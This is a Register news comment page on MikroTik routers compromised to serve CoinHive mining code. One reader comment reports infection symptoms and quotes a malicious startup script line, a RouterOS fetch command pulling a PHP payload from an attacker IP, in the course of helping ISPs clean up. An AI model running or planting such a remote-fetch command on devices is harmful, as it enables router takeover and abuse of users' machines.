back to article MikroTik routers grab their pickaxes, descend into the crypto mines

Researchers have found thousands of MikroTik network routers in Brazil serving up crypto-coin-crafting CoinHive code. Trustwave researcher Simon Kenin said this week one or more attackers have exploited a known vulnerability in Mikrotik's enterprise routers to inject error pages with code that uses visitors' machines to mine …

  1. D.U.B

    Do not know if it is related to this particular botnet, but I found a local WISP I help from time to time had some hacked Mikrotiks.

    Symptoms were as follows:

    RouterOS version 6.34.x or lower

    Multiple outbound connections to ports 8291 (WinBox) and 7547 (tr069)

    socks proxy enabled

    system scheduler set to run script on startup

    contents of script were:

    /tool fetch address=95.145.216.160 port=2008 src path=/mikrotik.php

    Found said php file in files on infected Mikrotiks

    Stopped digging at that point and informed WISP, and helped to mitigate the issue.

    Also found similar traffic on a second local WISP, informed them as well.

    I was very concerned because these were both my main and backup internet connections.

    Upon further investigation I found similar traffic coming in from upstream of my #1 provider, informed the carrier who delivers backbone to both providers a week ago.

    Still getting hit pretty hard with incoming traffic that matches the pattern, firewall rules I setup on Wisp #1 main router holding for now...

    Southwest Colorado USA

  2. Hermann

    Coinhive is so 2017

    Would be curious to see the ROI of this attack, every *decent* antivirus or adblocker now block Coinhive scripts

  3. Walter Bishop Silver badge
    Linux

    RouterOS is MikroTik's stand-alone operating system

    RouterOS is MikroTik's stand-alone operating system based on linux v3.3.5 kernel. The following list shows features found in the latest RouterOS release:’

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2019